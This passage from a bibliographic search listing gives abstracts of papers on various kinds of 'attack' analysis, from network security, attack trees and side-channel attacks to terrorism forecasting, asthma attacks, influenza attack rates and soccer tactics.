    In the present work the viability of using the neutron activation analysis to perform urine and blood clinical analysis was checked. The aim of this study is to investigate the biological behavior of animals that has been fed with chow doped by natural uranium for a long period. Aiming at time and cost reduction, the absolute method was applied to determine element concentration on biological samples. The quantitative results of urine sediment using NAA were compared with the conventional clinical analysis and the results were compatible. This methodology was also used on bone and body organs such as liver and muscles to help the interpretation of possible anomalies. (author)

  3. Dynamic Forecasting Conditional Probability of Bombing Attacks Based on Time-Series and Intervention Analysis.

    Science.gov (United States)

    Li, Shuying; Zhuang, Jun; Shen, Shifei

    2017-07-01

    In recent years, various types of terrorist attacks occurred, causing worldwide catastrophes. According to the Global Terrorism Database (GTD), among all attack tactics, bombing attacks happened most frequently, followed by armed assaults. In this article, a model for analyzing and forecasting the conditional probability of bombing attacks (CPBAs) based on time-series methods is developed. In addition, intervention analysis is used to analyze the sudden increase in the time-series process. The results show that the CPBA increased dramatically at the end of 2011. During that time, the CPBA increased by 16.0% in a two-month period to reach the peak value, but still stays 9.0% greater than the predicted level after the temporary effect gradually decays. By contrast, no significant fluctuation can be found in the conditional probability process of armed assault. It can be inferred that some social unrest, such as America's troop withdrawal from Afghanistan and Iraq, could have led to the increase of the CPBA in Afghanistan, Iraq, and Pakistan. The integrated time-series and intervention model is used to forecast the monthly CPBA in 2014 and through 2064. The average relative error compared with the real data in 2014 is 3.5%. The model is also applied to the total number of attacks recorded by the GTD between 2004 and 2014. © 2016 Society for Risk Analysis.

  4. Simulation of Attacks for Security in Wireless Sensor Network.

    Science.gov (United States)

    Diaz, Alvaro; Sanchez, Pablo

    2016-11-18

    The increasing complexity and low-power constraints of current Wireless Sensor Networks (WSN) require efficient methodologies for network simulation and embedded software performance analysis of nodes. In addition, security is also a very important feature that has to be addressed in most WSNs, since they may work with sensitive data and operate in hostile unattended environments. In this paper, a methodology for security analysis of Wireless Sensor Networks is presented. The methodology allows designing attack-aware embedded software/firmware or attack countermeasures to provide security in WSNs. The proposed methodology includes attacker modeling and attack simulation with performance analysis (node's software execution time and power consumption estimation). After an analysis of different WSN attack types, an attacker model is proposed. This model defines three different types of attackers that can emulate most WSN attacks. In addition, this paper presents a virtual platform that is able to model the node hardware, embedded software and basic wireless channel features. This virtual simulation analyzes the embedded software behavior and node power consumption while it takes into account the network deployment and topology. Additionally, this simulator integrates the previously mentioned attacker model. Thus, the impact of attacks on power consumption and software behavior/execution-time can be analyzed. This provides developers with essential information about the effects that one or multiple attacks could have on the network, helping them to develop more secure WSN systems. This WSN attack simulator is an essential element of the attack-aware embedded software development methodology that is also introduced in this work.

  5. Simulation of Attacks for Security in Wireless Sensor Network

    Science.gov (United States)

    Diaz, Alvaro; Sanchez, Pablo

    2016-01-01

    The increasing complexity and low-power constraints of current Wireless Sensor Networks (WSN) require efficient methodologies for network simulation and embedded software performance analysis of nodes. In addition, security is also a very important feature that has to be addressed in most WSNs, since they may work with sensitive data and operate in hostile unattended environments. In this paper, a methodology for security analysis of Wireless Sensor Networks is presented. The methodology allows designing attack-aware embedded software/firmware or attack countermeasures to provide security in WSNs. The proposed methodology includes attacker modeling and attack simulation with performance analysis (node’s software execution time and power consumption estimation). After an analysis of different WSN attack types, an attacker model is proposed. This model defines three different types of attackers that can emulate most WSN attacks. In addition, this paper presents a virtual platform that is able to model the node hardware, embedded software and basic wireless channel features. This virtual simulation analyzes the embedded software behavior and node power consumption while it takes into account the network deployment and topology. Additionally, this simulator integrates the previously mentioned attacker model. Thus, the impact of attacks on power consumption and software behavior/execution-time can be analyzed. This provides developers with essential information about the effects that one or multiple attacks could have on the network, helping them to develop more secure WSN systems. This WSN attack simulator is an essential element of the attack-aware embedded software development methodology that is also introduced in this work. PMID:27869710

  6. Design and implementation of network attack analysis and detect system

    International Nuclear Information System (INIS)

    Lu Zhigang; Wu Huan; Liu Baoxu

    2007-01-01

    This paper first analyzes the present research state of IDS (intrusion detection system), classifies and compares existing methods. According to the problems existing in IDS, such as false-positives, false-negatives and low information visualization, this paper suggests a system named NAADS which supports multi data sources. Through a series of methods such as clustering analysis, association analysis and visualization, rate of detection and usability of NAADS are increased. (authors)

  7. Vulnerability analysis and critical areas identification of the power systems under terrorist attacks

    Science.gov (United States)

    Wang, Shuliang; Zhang, Jianhua; Zhao, Mingwei; Min, Xu

    2017-05-01

    This paper takes central China power grid (CCPG) as an example, and analyzes the vulnerability of the power systems under terrorist attacks. To simulate the intelligence of terrorist attacks, a method of critical attack area identification according to community structures is introduced. Meanwhile, three types of vulnerability models and the corresponding vulnerability metrics are given for comparative analysis. On this basis, influence of terrorist attacks on different critical areas is studied. Identifying the vulnerability of different critical areas will be conducted. At the same time, vulnerabilities of critical areas under different tolerance parameters and different vulnerability models are acquired and compared. Results show that only a few number of vertex disruptions may cause some critical areas collapse completely, they can generate great performance losses the whole systems. Further more, the variation of vulnerability values under different scenarios is very large. Critical areas which can cause greater damage under terrorist attacks should be given priority of protection to reduce vulnerability. The proposed method can be applied to analyze the vulnerability of other infrastructure systems, they can help decision makers search mitigation action and optimum protection strategy.

  8. A Hop-Count Analysis Scheme for Avoiding Wormhole Attacks in MANET

    Directory of Open Access Journals (Sweden)

    Chi-Sung Laih

    2009-06-01

    Full Text Available MANET, due to the nature of wireless transmission, has more security issues compared to wired environments. A specific type of attack, the Wormhole attack does not require exploiting any nodes in the network and can interfere with the route establishment process. Instead of detecting wormholes from the role of administrators as in previous methods, we implement a new protocol, MHA, using a hop-count analysis from the viewpoint of users without any special environment assumptions. We also discuss previous works which require the role of administrator and their reliance on impractical assumptions, thus showing the advantages of MHA.

  9. ADTool: Security Analysis with Attack-Defense Trees

    NARCIS (Netherlands)

    Kordy, Barbara; Kordy, P.T.; Mauw, Sjouke; Schweitzer, Patrick; Joshi, Kaustubh; Siegle, Markus; Stoelinga, Mariëlle Ida Antoinette; d' Argenio, P.R.

    ADTool is free, open source software assisting graphical modeling and quantitative analysis of security, using attack–defense trees. The main features of ADTool are easy creation, efficient editing, and automated bottom-up evaluation of security-relevant measures. The tool also supports the usage of

  10. Analysis of the NIST database towards the composition of vulnerabilities in attack scenarios

    NARCIS (Netherlands)

    Nunes Leal Franqueira, V.; van Keulen, Maurice

    The composition of vulnerabilities in attack scenarios has been traditionally performed based on detailed pre- and post-conditions. Although very precise, this approach is dependent on human analysis, is time consuming, and not at all scalable. We investigate the NIST National Vulnerability Database

  11. Theoretical and methodological approaches in discourse analysis.

    Science.gov (United States)

    Stevenson, Chris

    2004-01-01

    Discourse analysis (DA) embodies two main approaches: Foucauldian DA and radical social constructionist DA. Both are underpinned by social constructionism to a lesser or greater extent. Social constructionism has contested areas in relation to power, embodiment, and materialism, although Foucauldian DA does focus on the issue of power Embodiment and materialism may be especially relevant for researchers of nursing where the physical body is prominent. However, the contested nature of social constructionism allows a fusion of theoretical and methodological approaches tailored to a specific research interest. In this paper, Chris Stevenson suggests a framework for working out and declaring the DA approach to be taken in relation to a research area, as well as to aid anticipating methodological critique. Method, validity, reliability and scholarship are discussed from within a discourse analytic frame of reference.

  12. Theoretical and methodological approaches in discourse analysis.

    Science.gov (United States)

    Stevenson, Chris

    2004-10-01

    Discourse analysis (DA) embodies two main approaches: Foucauldian DA and radical social constructionist DA. Both are underpinned by social constructionism to a lesser or greater extent. Social constructionism has contested areas in relation to power, embodiment, and materialism, although Foucauldian DA does focus on the issue of power. Embodiment and materialism may be especially relevant for researchers of nursing where the physical body is prominent. However, the contested nature of social constructionism allows a fusion of theoretical and methodological approaches tailored to a specific research interest. In this paper, Chris Stevenson suggests a frame- work for working out and declaring the DA approach to be taken in relation to a research area, as well as to aid anticipating methodological critique. Method, validity, reliability and scholarship are discussed from within a discourse analytic frame of reference.

  13. Stress analysis of advanced attack helicopter composite main rotor blade root end lug

    Science.gov (United States)

    Baker, D. J.

    1982-01-01

    Stress analysis of the Advanced Attack Helicopter (AAH) composite main rotor blade root end lug is described. The stress concentration factor determined from a finite element analysis is compared to an empirical value used in the lug design. The analysis and test data indicate that the stress concentration is primarily a function of configuration and independent of the range of material properties typical of Kevlar-49/epoxy and glass epoxy.

  14. Malware Analysis: From Large-Scale Data Triage to Targeted Attack Recognition (Dagstuhl Seminar 17281)

    OpenAIRE

    Zennou, Sarah; Debray, Saumya K.; Dullien, Thomas; Lakhothia, Arun

    2018-01-01

    This report summarizes the program and the outcomes of the Dagstuhl Seminar 17281, entitled "Malware Analysis: From Large-Scale Data Triage to Targeted Attack Recognition". The seminar brought together practitioners and researchers from industry and academia to discuss the state-of-the art in the analysis of malware from both a big data perspective and a fine grained analysis. Obfuscation was also considered. The meeting created new links within this very diverse community.

  15. Requirements Analysis in the Value Methodology

    Energy Technology Data Exchange (ETDEWEB)

    Conner, Alison Marie

    2001-05-01

    The Value Methodology (VM) study brings together a multidisciplinary team of people who own the problem and have the expertise to identify and solve it. With the varied backgrounds and experiences the team brings to the study, come different perspectives on the problem and the requirements of the project. A requirements analysis step can be added to the Information and Function Analysis Phases of a VM study to validate whether the functions being performed are required, either regulatory or customer prescribed. This paper will provide insight to the level of rigor applied to a requirements analysis step and give some examples of tools and techniques utilized to ease the management of the requirements and functions those requirements support for highly complex problems.

  16. Cost analysis methodology of spent fuel storage

    International Nuclear Information System (INIS)

    1994-01-01

    The report deals with the cost analysis of interim spent fuel storage; however, it is not intended either to give a detailed cost analysis or to compare the costs of the different options. This report provides a methodology for calculating the costs of different options for interim storage of the spent fuel produced in the reactor cores. Different technical features and storage options (dry and wet, away from reactor and at reactor) are considered and the factors affecting all options defined. The major cost categories are analysed. Then the net present value of each option is calculated and the levelized cost determined. Finally, a sensitivity analysis is conducted taking into account the uncertainty in the different cost estimates. Examples of current storage practices in some countries are included in the Appendices, with description of the most relevant technical and economic aspects. 16 figs, 14 tabs

  17. RAMS (Risk Analysis - Modular System) methodology

    Energy Technology Data Exchange (ETDEWEB)

    Stenner, R.D.; Strenge, D.L.; Buck, J.W. [and others

    1996-10-01

    The Risk Analysis - Modular System (RAMS) was developed to serve as a broad scope risk analysis tool for the Risk Assessment of the Hanford Mission (RAHM) studies. The RAHM element provides risk analysis support for Hanford Strategic Analysis and Mission Planning activities. The RAHM also provides risk analysis support for the Hanford 10-Year Plan development activities. The RAMS tool draws from a collection of specifically designed databases and modular risk analysis methodologies and models. RAMS is a flexible modular system that can be focused on targeted risk analysis needs. It is specifically designed to address risks associated with overall strategy, technical alternative, and `what if` questions regarding the Hanford cleanup mission. RAMS is set up to address both near-term and long-term risk issues. Consistency is very important for any comparative risk analysis, and RAMS is designed to efficiently and consistently compare risks and produce risk reduction estimates. There is a wide range of output information that can be generated by RAMS. These outputs can be detailed by individual contaminants, waste forms, transport pathways, exposure scenarios, individuals, populations, etc. However, they can also be in rolled-up form to support high-level strategy decisions.

  18. Analysis of techniques of sample attack for soil and mineral analysis

    International Nuclear Information System (INIS)

    Dean, J.R.; Chiu, N.W.

    1985-05-01

    Four methods of sample attack were evaluated in the laboratory for use in the determination of uranium, radium-226, thorium-232, thorium-230, thorium-228, and lead-210. The methods evaluated were (1) KF/pyrosulfate fusion; (2) Sodium carbonate fusion; (3) Nitric, perchloric, hydrofluoric acid digestion; and, (4) combination nitric, perchloric, hydrofluoric acid/pyrosulfate fusion. Five samples were chosen for evaluation; two were mine tailings from Bancroft, Ontario and Beaverlodge, Saskatchewan, one was a synthetic uranium ore-silica mixture and two were soil samples supplied by AECB. The KF/pyrosulfate dissolution procedure was found to be the fastest and, overall, most accurate dissolution method for the analysis of 1-20 samples. For larger numbers of samples the three acid/pyrosulfate fusion combination was shown to have some merit

  19. Environmental impact statement analysis: dose methodology

    International Nuclear Information System (INIS)

    Mueller, M.A.; Strenge, D.L.; Napier, B.A.

    1981-01-01

    Standardized sections and methodologies are being developed for use in environmental impact statements (EIS) for activities to be conducted on the Hanford Reservation. Five areas for standardization have been identified: routine operations dose methodologies, accident dose methodology, Hanford Site description, health effects methodology, and socioeconomic environment for Hanford waste management activities

  20. AR.Drone: security threat analysis and exemplary attack to track persons

    Science.gov (United States)

    Samland, Fred; Fruth, Jana; Hildebrandt, Mario; Hoppe, Tobias; Dittmann, Jana

    2012-01-01

    In this article we illustrate an approach of a security threat analysis of the quadrocopter AR.Drone, a toy for augmented reality (AR) games. The technical properties of the drone can be misused for attacks, which may relate security and/or privacy aspects. Our aim is to sensitize for the possibility of misuses and the motivation for an implementation of improved security mechanisms of the quadrocopter. We focus primarily on obvious security vulnerabilities (e.g. communication over unencrypted WLAN, usage of UDP, live video streaming via unencrypted WLAN to the control device) of this quadrocopter. We could practically verify in three exemplary scenarios that this can be misused by unauthorized persons for several attacks: high-jacking of the drone, eavesdropping of the AR.Drones unprotected video streams, and the tracking of persons. Amongst other aspects, our current research focuses on the realization of the attack of tracking persons and objects with the drone. Besides the realization of attacks, we want to evaluate the potential of this particular drone for a "safe-landing" function, as well as potential security enhancements. Additionally, in future we plan to investigate an automatic tracking of persons or objects without the need of human interactions.

  1. Security and Risk Analysis of Nuclear Safeguards Instruments Using Attack Trees

    International Nuclear Information System (INIS)

    Naumann, I.; Wishard, B.

    2015-01-01

    The IAEA's nuclear safeguards instruments must be frequently evaluated against attack vectors, which are extremely varied and, at first approximation, may seem inconsequential, but are not. To accurately analyze the impact of attacks on a multi-component system requires a highly structured and well-documented assessment. Tree structures, such as fault trees, have long been used to assess the consequences of selecting potential solutions and their impact on risk. When applied to security threats by introducing threat agents (adversaries) and vulnerabilities, this approach can be extremely valuable in uncovering previously unidentified risks and identifying mitigation steps. This paper discusses how attack trees can be used for the security analysis of nuclear safeguards instruments. The root node of such a tree represents an objective that negatively impacts security such as disclosing and/or falsifying instrument data or circumventing safeguards methods. Usually, this objective is rather complex and attaining it requires a combination of several security breaches which may vary on how much funding or what capabilities are required in order to execute them. Thus, it is necessary to break the root objective into smaller, less complex units. Once a leaf node describes a reasonably comprehensible action, it is the security experts' task to allocate levels of difficulty and funding to this node. Eventually, the paths from the leaf nodes to the root node describe all possible combinations of actions necessary to carry out a successful attack. The use of a well-structured attack tree facilitates the developer in thinking like the adversary providing more effective security solutions. (author)

  2. Analysis of Windward Side Hypersonic Boundary Layer Transition on Blunted Cones at Angle of Attack

    Science.gov (United States)

    2017-01-09

    correlated with PSE/LST N-Factors. 15. SUBJECT TERMS boundary layer transition, hypersonic, ground test 16. SECURITY CLASSIFICATION OF: 17. LIMITATION ...Maccoll) solution e condition at boundary layer edge w condition at wall, viscous ∞ condition in freestream Conventions LST Linear Stability Theory PSE...STATES AIR FORCE AFRL-RQ-WP-TP-2017-0169 ANALYSIS OF WINDWARD SIDE HYPERSONIC BOUNDARY LAYER TRANSITION ON BLUNTED CONES AT ANGLE OF ATTACK Roger

  3. Studying creativity training programs: A methodological analysis

    DEFF Research Database (Denmark)

    Valgeirsdóttir, Dagný; Onarheim, Balder

    2017-01-01

    Throughout decades of creativity research, a range of creativity training programs have been developed, tested, and analyzed. In 2004 Scott and colleagues published a meta‐analysis of all creativity training programs to date, and the review presented here sat out to identify and analyze studies...... published since the seminal 2004 review. Focusing on quantitative studies of creativity training programs for adults, our systematic review resulted in 22 publications. All studies were analyzed, but comparing the reported effectiveness of training across studies proved difficult due to methodological...... inconsistencies, variations in reporting of results as well as types of measures used. Thus a consensus for future studies is called for to answer the question: Which elements make one creativity training program more effective than another? This is a question of equal relevance to academia and industry...

  4. Methodologies for risk analysis in slope instability

    International Nuclear Information System (INIS)

    Bernabeu Garcia, M.; Diaz Torres, J. A.

    2014-01-01

    This paper is an approach to the different methodologies used in conducting landslide risk maps so that the reader can get a basic knowledge about how to proceed in its development. The landslide hazard maps are increasingly demanded by governments. This is because due to climate change, deforestation and the pressure exerted by the growth of urban centers, damage caused by natural phenomena is increasing each year, making this area of work a field of study with increasing importance. To explain the process of mapping a journey through each of the phases of which it is composed is made: from the study of the types of slope movements and the necessary management of geographic information systems (GIS) inventories and landslide susceptibility analysis, threat, vulnerability and risk. (Author)

  5. Attack rates assessment of the 2009 pandemic H1N1 influenza A in children and their contacts: a systematic review and meta-analysis.

    Directory of Open Access Journals (Sweden)

    Aharona Glatman-Freedman

    Full Text Available BACKGROUND: The recent H1N1 influenza A pandemic was marked by multiple reports of illness and hospitalization in children, suggesting that children may have played a major role in the propagation of the virus. A comprehensive detailed analysis of the attack rates among children as compared with their contacts in various settings is of great importance for understanding their unique role in influenza pandemics. METHODOLOGY/PRINCIPAL FINDINGS: We searched MEDLINE (PubMed and Embase for published studies reporting outbreak investigations with direct measurements of attack rates of the 2009 pandemic H1N1 influenza A among children, and quantified how these compare with those of their contacts. We identified 50 articles suitable for review, which reported school, household, travel and social events. The selected reports and our meta-analysis indicated that children had significantly higher attack rates as compared to adults, and that this phenomenon was observed for both virologically confirmed and clinical cases, in various settings and locations around the world. The review also provided insight into some characteristics of transmission between children and their contacts in the various settings. CONCLUSION/SIGNIFICANCE: The consistently higher attack rates of the 2009 pandemic H1N1 influenza A among children, as compared to adults, as well as the magnitude of the difference is important for understanding the contribution of children to disease burden, for implementation of mitigation strategies directed towards children, as well as more precise mathematical modeling and simulation of future influenza pandemics.

  6. Use of Attack Graphs in Security Systems

    Directory of Open Access Journals (Sweden)

    Vivek Shandilya

    2014-01-01

    Full Text Available Attack graphs have been used to model the vulnerabilities of the systems and their potential exploits. The successful exploits leading to the partial/total failure of the systems are subject of keen security interest. Considerable effort has been expended in exhaustive modeling, analyses, detection, and mitigation of attacks. One prominent methodology involves constructing attack graphs of the pertinent system for analysis and response strategies. This not only gives the simplified representation of the system, but also allows prioritizing the security properties whose violations are of greater concern, for both detection and repair. We present a survey and critical study of state-of-the-art technologies in attack graph generation and use in security system. Based on our research, we identify the potential, challenges, and direction of the current research in using attack graphs.

  7. Cyber Security Analysis by Attack Trees for a Reactor Protection System

    International Nuclear Information System (INIS)

    Park, Gee-Yong; Lee, Cheol Kwon; Choi, Jong Gyun; Kim, Dong Hoon; Lee, Young Jun; Kwon, Kee-Choon

    2008-01-01

    As nuclear facilities are introducing digital systems, the cyber security becomes an emerging topic to be analyzed and resolved. The domestic and other nation's regulatory bodies notice this topic and are preparing an appropriate guidance. The nuclear industry where new construction or upgrade of I and C systems is planned is analyzing and establishing a cyber security. A risk-based analysis for the cyber security has been performed in the KNICS (Korea Nuclear I and C Systems) project where the cyber security analysis has been applied to a reactor protection system (RPS). In this paper, the cyber security analysis based on the attack trees is proposed for the KNICS RPS

  8. Stability Analysis of Hypersonic Boundary Layer over a Cone at Small Angle of Attack

    Directory of Open Access Journals (Sweden)

    Feng Ji

    2014-04-01

    Full Text Available An investigation on the stability of hypersonic boundary layer over a cone at small angle of attack has been performed. After obtaining the steady base flow, linear stability theory (LST analysis has been made with local parallel assumption. The growth rates of the first mode and second mode waves at different streamwise locations and different azimuthal angles are obtained. The results show that the boundary layer stability was greatly influenced by small angles of attack. The maximum growth rate of the most unstable wave on the leeward is larger than that on the windward. Moreover, dominating second mode wave starts earlier on the leeward than that on the windward. The LST result also shows that there is a “valley” region around 120°~150° meridian in the maximum growth rates curve.

  9. Analysis Of Default Passwords In Routers Against Brute-Force Attack

    Directory of Open Access Journals (Sweden)

    Mohammed Farik

    2015-08-01

    Full Text Available Abstract Password authentication is the main means of access control on network routers and router manufacturers provide a default password for initial login to the router. While there has been many publications regarding the minimum requirements of a good password how widely the manufacturers themselves are adhering to the minimum standards and whether these passwords can withstand brute-force attack are not widely known. The novelty of this research is that this is the first time default passwords have been analyzed and documented from such a large variety of router models to reveal password strengths or weaknesses against brute-force attacks. Firstly individual default router password of each model was collected tabulated and tested using password strength meter for entropy. Then descriptive statistical analysis was performed on the tabulated data. The analysis revealed quantitatively how strong or weak default passwords are against brute-force attacks. The results of this research give router security researchers router manufacturers router administrators a useful guide on the strengths and weaknesses of passwords that follow similar patterns.

  10. Setting Component Priorities in Protecting NPPs against Cyber-Attacks Using Reliability Analysis Techniques

    International Nuclear Information System (INIS)

    Choi, Moon Kyoung; Seong, Poong Hyun; Son, Han Seong

    2017-01-01

    The digitalization of infrastructure makes systems vulnerable to cyber threats and hybrid attacks. According to ICS-CERT report, as time goes by, the number of vulnerabilities in ICS industries increases rapidly. Digital I and C systems have been developed and installed in nuclear power plants, and due to installation of the digital I and C systems, cyber security concerns are increasing in nuclear industry. However, there are too many critical digital assets to be inspected in digitalized NPPs. In order to reduce the inefficiency of regulation in nuclear facilities, the critical components that are directly related to an accident are elicited by using the reliability analysis techniques. Target initial events are selected, and their headings are analyzed through event tree analysis about whether the headings can be affected by cyber-attacks or not. Among the headings, the headings that can be proceeded directly to the core damage by the cyber-attack when they are fail are finally selected as the target of deriving the minimum cut-sets. We analyze the fault trees and derive the minimum set-cuts. In terms of original PSA, the value of probability for the cut-sets is important but the probability is not important in terms of cyber security of NPPs. The important factors is the number of basic events consisting of the minimal cut-sets that is proportional to vulnerability.

  11. Performance analysis of chaotic and white watermarks in the presence of common watermark attacks

    Energy Technology Data Exchange (ETDEWEB)

    Mooney, Aidan [Department of Computer Science, NUI Maynooth, Co. Kildare (Ireland)], E-mail: amooney@cs.nuim.ie; Keating, John G. [Department of Computer Science, NUI Maynooth, Co. Kildare (Ireland)], E-mail: john.keating@nuim.ie; Heffernan, Daniel M. [Department of Mathematical Physics, NUI Maynooth, Co. Kildare (Ireland); School of Theoretical Physics, Dublin Institute for Advanced Studies, Dublin 4 (Ireland)], E-mail: dmh@thphys.nuim.ie

    2009-10-15

    Digital watermarking is a technique that aims to embed a piece of information permanently into some digital media, which may be used at a later stage to prove owner authentication and attempt to provide protection to documents. The most common watermark types used to date are pseudorandom number sequences which possess a white spectrum. Chaotic watermark sequences have been receiving increasing interest recently and have been shown to be an alternative to the pseudorandom watermark types. In this paper the performance of pseudorandom watermarks and chaotic watermarks in the presence of common watermark attacks is performed. The chaotic watermarks are generated from the iteration of the skew tent map, the Bernoulli map and the logistic map. The analysis focuses on the watermarked images after they have been subjected to common image distortion attacks. The capacities of each of these images are also calculated. It is shown that signals generated from lowpass chaotic signals have superior performance over the other signal types analysed for the attacks studied.

  12. Dynamic Analysis of the Evolution of Cereus peruvianus (Cactaceae Areas Attacked by Phoma sp.

    Directory of Open Access Journals (Sweden)

    Gyorgy FESZT

    2009-12-01

    Full Text Available Cereus Peruvianus (night blooming Cereus, or peruvian apple is one of the sensitive species to Phoma attack. Photographic images can intercept a certain phytopathology, at a certain moment. The computerized analysis of such an image turns into a value the spread which the phytopathological process has at that moment. The purpose of this study is to assimilate the technique of achieving successions of digital photos of Cereus peruvianus f. monstruosa attacked by Phoma sp. Parallely with recording the images, with the help of Rhythm digital temperature humidity controller, were recorded data about the green house microclimate (air humidity-minimum and maximum, temperature-minimum and maximum. In the first stage of the study, the attack presents small fluctuations, reaching a high level in days with low temperatures. So, the most significant growths were recorded in the periods: 10. 02. 2005-20. 02. 2005 with an affected area of 10.97-8.82 = 2.15 and 11. 03. 2005-22. 04. 2005 with growth differences of 14.67-13.32 = 1.35. Generally, the affected areas grow in days with low minimum temperatures. The great advantage of this technique is represented by the possibility of using in situ in home areas of species or crop plants in fields. Repeated images, achieved in time, then overlapped, can provide important data on the evolution of affected areas.

  13. A Review of Citation Analysis Methodologies for Collection Management

    Science.gov (United States)

    Hoffmann, Kristin; Doucette, Lise

    2012-01-01

    While there is a considerable body of literature that presents the results of citation analysis studies, most researchers do not provide enough detail in their methodology to reproduce the study, nor do they provide rationale for methodological decisions. In this paper, we review the methodologies used in 34 recent articles that present a…

  14. Clean Energy Manufacturing Analysis Center Benchmark Report: Framework and Methodologies

    Energy Technology Data Exchange (ETDEWEB)

    Sandor, Debra [National Renewable Energy Lab. (NREL), Golden, CO (United States); Chung, Donald [National Renewable Energy Lab. (NREL), Golden, CO (United States); Keyser, David [National Renewable Energy Lab. (NREL), Golden, CO (United States); Mann, Margaret [National Renewable Energy Lab. (NREL), Golden, CO (United States); Engel-Cox, Jill [National Renewable Energy Lab. (NREL), Golden, CO (United States)

    2017-05-23

    This report documents the CEMAC methodologies for developing and reporting annual global clean energy manufacturing benchmarks. The report reviews previously published manufacturing benchmark reports and foundational data, establishes a framework for benchmarking clean energy technologies, describes the CEMAC benchmark analysis methodologies, and describes the application of the methodologies to the manufacturing of four specific clean energy technologies.

  15. Practical In-Depth Analysis of IDS Alerts for Tracing and Identifying Potential Attackers on Darknet

    Directory of Open Access Journals (Sweden)

    Jungsuk Song

    2017-02-01

    Full Text Available The darknet (i.e., a set of unused IP addresses is a very useful solution for observing the global trends of cyber threats and analyzing attack activities on the Internet. Since the darknet is not connected with real systems, in most cases, the incoming packets on the darknet (‘the darknet traffic’ do not contain a payload. This means that we are unable to get real malware from the darknet traffic. This situation makes it difficult for security experts (e.g., academic researchers, engineers, operators, etc. to identify whether the source hosts of the darknet traffic are infected by real malware or not. In this paper, we present the overall procedure of the in-depth analysis between the darknet traffic and IDS alerts using real data collected at the Science and Technology Cyber Security Center (S&T CSC in Korea and provide the detailed in-depth analysis results. The ultimate goal of this paper is to provide practical experience, insight and know-how to security experts so that they are able to identify and trace the root cause of the darknet traffic. The experimental results show that correlation analysis between the darknet traffic and IDS alerts is very useful to discover potential attack hosts, especially internal hosts, and to find out what kinds of malware infected them.

  16. Attacking and defensive styles of play in soccer: analysis of Spanish and English elite teams.

    Science.gov (United States)

    Fernandez-Navarro, Javier; Fradua, Luis; Zubillaga, Asier; Ford, Paul R; McRobert, Allistair P

    2016-12-01

    The aim of this study was to define and categorise different styles of play in elite soccer and associated performance indicators by using factor analysis. Furthermore, the observed teams were categorised using all factor scores. Data were collected from 97 matches from the Spanish La Liga and the English Premier League from the seasons 2006-2007 and 2010-2011 using the Amisco® system. A total of 19 performance indicators, 14 describing aspects of attacking play and five describing aspects of defensive play, were included in the factor analysis. Six factors, representing 12 different styles of play (eight attacking and four defensive), had eigenvalues greater than 1 and explained 87.54% of the total variance. Direct and possession styles of play, defined by factor 1, were the most apparent styles. Factor analysis used the performance indicators to cluster each team's style of play. Findings showed that a team's style of play was defined by specific performance indicators and, consequently, teams can be classified to create a playing style profile. For practical implications, playing styles profiling can be used to compare different teams and prepare for opponents in competition. Moreover, teams could use specific training drills directed to improve their styles of play.

  17. Vulnerability of advanced encryption standard algorithm to differential power analysis attacks implemented on ATmega-128 microcontroller

    CSIR Research Space (South Africa)

    Mpalane, Kealeboga

    2016-09-01

    Full Text Available A wide variety of cryptographic embedded devices including smartcards, ASICs and FPGAs must be secure against breaking in. However, these devices are vulnerable to side channel attacks. A side channel attack uses physical attributes...

  18. A retrospective analysis of practice patterns in the management of acute asthma attack across Turkey.

    Science.gov (United States)

    Türktaş, Haluk; Bavbek, Sevim; Misirligil, Zeynep; Gemicioğlu, Bilun; Mungan, Dilşad

    2010-12-01

    To evaluate patient characteristics and practice patterns in the management of acute asthma attack at tertiary care centers across Turkey. A total of 294 patients (mean age: 50.4 ± 15.1 years; females: 80.3%) diagnosed with persistent asthma were included in this retrospective study upon their admission to the hospital with an acute asthma attack. Patient demographics, asthma control level, asthma attack severity and the management of the attack were evaluated. There was no influence of gender on asthma control and attack severity. In 57.5% of the patients, asthma attack was moderate. Most patients (78.9%) were hospitalized with longer duration evident in the severe attack. Spirometry and chest X-Ray were the most frequent tests (85.4%), while steroids (72.0% parenteral; 29.0% oral) and short-acting beta-agonists (SABA) + anticholinergics (45.5%) were the main drugs of choice in the attack management. Attack severity and pre-attack asthma control level was significantly correlated (p attack asthma was uncontrolled in 42.6% of the patients with severe attack. Most of the patients were on combination of more than one (two in 38.7% and 3-4 in 31.2%) controller drugs before the attack. Providing country specific data on practice patterns in the management of acute asthma attack in a representative cohort in Turkey, prescription of steroids and SABA + anticholinergics as the main drugs of choice was in line with guidelines while the significant relation of pre-attack asthma control to risk/severity of asthma attack and rate/duration of hospitalization seem to be the leading results of the present study. Copyright © 2010 Elsevier Ltd. All rights reserved.

  19. Timing Analysis of SSL/TLS Man in the Middle Attacks

    OpenAIRE

    Benton, Kevin; Bross, Ty

    2013-01-01

    Man in the middle attacks are a significant threat to modern e-commerce and online communications, even when such transactions are protected by TLS. We intend to show that it is possible to detect man-in-the-middle attacks on SSL and TLS by detecting timing differences between a standard SSL session and an attack we created.

  20. A Stochastic Framework for Quantitative Analysis of Attack-Defense Trees

    NARCIS (Netherlands)

    Jhawar, Ravi; Lounis, Karim; Mauw, Sjouke

    2016-01-01

    Cyber attacks are becoming increasingly complex, practically sophisticated and organized. Losses due to such attacks are important, varying from the loss of money to business reputation spoilage. Therefore, there is a great need for potential victims of cyber attacks to deploy security solutions

  1. Methodology for Mode Selection in Corridor Analysis of Freight Transportation

    OpenAIRE

    Kanafani, Adib

    1984-01-01

    The purpose of tins report is to outline a methodology for the analysis of mode selection in freight transportation. This methodology is intended to partake of transportation corridor analysts, a component of demand analysis that is part of a national transportation process. The methodological framework presented here provides a basis on which specific models and calculation procedures might be developed. It also provides a basis for the development of a data management system suitable for co...

  2. Kinematic Analysis of Volleyball Attack in the Net Center with Various Types of Take-Off.

    Science.gov (United States)

    Zahálka, František; Malý, Tomáš; Malá, Lucia; Ejem, Miloslav; Zawartka, Marek

    2017-09-01

